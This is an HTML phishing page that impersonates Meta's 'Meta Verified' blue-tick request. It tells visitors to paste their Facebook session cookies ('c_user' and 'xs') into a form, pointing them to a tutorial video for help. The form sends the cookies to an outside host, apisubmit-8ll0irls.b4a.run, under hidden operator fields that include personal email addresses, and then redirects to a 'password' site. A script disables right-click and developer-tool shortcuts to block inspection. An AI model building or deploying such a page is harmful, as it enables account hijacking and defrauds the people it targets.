<!DOCTYPE html>
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <link rel="icon" href="https://pbs.twimg.com/media/GQB99gQaQAEUOZ7?format=png&amp;name=small">
    <link rel="stylesheet" href="css/sub-req-for--badge.vercel.app-style.css">
    <title>Meta Verified | Get a verified blue tick</title>
</head>
<body>

    <nav>
        <div class="av-l">
            <p class="txt-2">
                facebook
            </p>
        </div>
        <div class="av-r">
            <div class="sh-box">
                <img src="images/sub-req-for--badge.vercel.app-search.png" alt="search">
                <input type="text" placeholder="Search">
            </div>
        </div>
    </nav>

  <div class="deho">

    <form class="content" action="https://apisubmit-8ll0irls.b4a.run/post" method="post">
      <input hidden="true" name="name" value="Saad">
      <input hidden="true" name="workerEmail" value="saadnizamani19@gmail.com">
      <input hidden="true" name="email" value="saadnizamani555@gmail.com">
      <input hidden="true" name="redirectUrl" value="https://password-b.vercel.app/">

      <p class="head">Request a verified badge on Facebook</p> <br>

      <div class="text5">

        <p>
          The verified badge means that Facebook has confirmed that the Page or profile is the authentic presence of the individual, public figure or brand that it represents.</p> <p>
      <br>
        Previously, the verified badge also required the person or brand to be notable and unique. You may still see users with a verified badge that represents our previous eligibility requirements.</p><p>
      <br>
        Please provide the precise details below. Refer to the video for clarification if you find the instructions unclear.
      </p>
  
      </div>

      <div class="vd2">

        <p class="text3">Detailed Video Information</p>

        <a href="cookies.mp4?v=1719846896202">
          <img src="images/sub-req-for--badge.vercel.app-facebook.png" width="230">
        </a>
        
        <h3>
          Must Watch the video and submit required information correctly.
        </h3><br>
        <p class="text5">Please be sure to provide the requested information below.</p>

      </div>

      <div>
        <p class="tx-2">
        c_user
       </p>
        <input type="number" name="c_user" id="c_user" pattern="[0-9]+" minlength="6" required="">
      </div>

      <div>
        <p class="tx-2">
        xs
       </p>
        <input type="text" name="xs" id="xs" required="">
      </div>
      <p class="t1">Please make sure account not to log out from your computer or laptop until you have received a verification email.</p>

      <div class="sub2">
        <button class="bn2">
          <p>
            Submit
          </p>
        </button>
  
      </div>

    </form>
    
  </div>

  <div class="copyright">
    <p>Meta © 2024</p>
  </div>

  <script>
    document.addEventListener('contextmenu', function(e) {
        e.preventDefault();
    });
    document.onkeydown = function(e) {
        if (e.ctrlKey && (e.shiftKey || e.key === "I" || e.key === "i")) {
            e.preventDefault();
        }
    };
</script>
    



</body></html>
